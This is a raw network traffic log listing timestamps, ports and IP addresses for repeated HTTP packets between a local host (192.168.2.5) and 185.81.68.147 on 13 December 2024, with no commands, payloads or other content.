Dec 13, 2024 01:37:36.220555067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220570087 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220613003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220627069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220654011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220666885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220695019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220710039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220735073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220752001 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220777035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220791101 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220905066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.220907927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.220933914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221251965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221278906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221290112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221353054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221368074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221394062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221467018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221467018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221487045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221503973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221532106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221545935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221570015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221765041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221801043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221817017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221847057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221862078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221884966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221899986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221926928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221941948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221966028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.221981049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222008944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222131968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222156048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222222090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222253084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222270966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222349882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222385883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222408056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222476006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222512007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222543955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222568035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222582102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222609997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222788095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222817898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222834110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222861052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222875118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222903013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222915888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222940922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222955942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.222980976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223001957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223026037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223129034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223146915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223170042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223257065 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223274946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223332882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223370075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223393917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223411083 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223707914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223761082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223762035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223795891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223819017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223866940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223866940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223920107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.223973989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224025011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224050999 CET	49780	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:36.224054098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224400043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224622011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224636078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224668026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224682093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224709988 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224724054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224750042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224770069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224793911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224807024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224836111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224858999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224880934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.224981070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225008011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225029945 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225055933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225120068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225143909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225157976 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225241899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225255966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225292921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225353003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225375891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225399971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225425005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225440025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225466967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225636959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225671053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225684881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225716114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225729942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225756884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225769043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225796938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225811005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225841045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225857019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225882053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225963116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.225991011 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226011038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226039886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226106882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226130009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226145029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226228952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226264000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226280928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226355076 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226388931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226411104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226434946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226455927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226478100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226630926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226654053 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226677895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226696014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226717949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226742029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226752996 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226780891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226794004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226819038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226834059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226864100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226877928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226970911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.226994991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227013111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227039099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227102041 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227124929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227145910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227219105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227255106 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227308989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227341890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227355957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227379084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227392912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227421045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227433920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227463007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227615118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227638960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227663994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227680922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227701902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227725029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227741003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227763891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227781057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227811098 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227821112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227850914 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227864981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227890015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.227976084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228002071 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228018999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228043079 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228105068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228122950 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228144884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228210926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228235960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228251934 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228316069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228329897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228358030 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228374004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228398085 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228415012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228437901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228590965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228616953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228631020 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228656054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228668928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228701115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228713989 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228739977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228750944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228777885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228791952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228818893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228832006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228859901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228949070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228971958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.228986025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229012966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229073048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229109049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229132891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229208946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229248047 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229305983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229327917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229348898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229374886 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229387999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229413986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.229429960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232283115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232283115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232299089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232322931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232343912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232357025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232383966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232409000 CET	49781	80	192.168.2.5	185.81.68.148
Dec 13, 2024 01:37:36.232419968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232559919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232603073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232616901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232642889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232665062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232719898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232764959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232780933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232830048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.232873917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233161926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233236074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233263016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233280897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233366966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233402967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233417034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233442068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233457088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233486891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233503103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233710051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233724117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233752966 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233767986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233795881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233809948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233835936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233848095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233875036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233890057 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233913898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233927965 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233952045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233968019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.233997107 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234093904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234117985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234134912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234160900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234222889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234245062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234261036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234287977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234347105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234369993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234384060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234411955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234472036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234503031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234527111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234553099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234565973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234596968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234781027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234810114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234826088 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234853029 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234865904 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234891891 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234905958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234930992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234955072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234977007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.234991074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235018969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235043049 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235192060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235228062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235297918 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235330105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235342026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235363960 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235418081 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235445023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235457897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235490084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235544920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235569000 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235588074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235619068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235631943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235657930 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235671043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235701084 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235872984 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235898018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235910892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235939026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235951900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.235979080 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236002922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236017942 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236038923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236063004 CET	49775	80	192.168.2.5	185.81.68.147
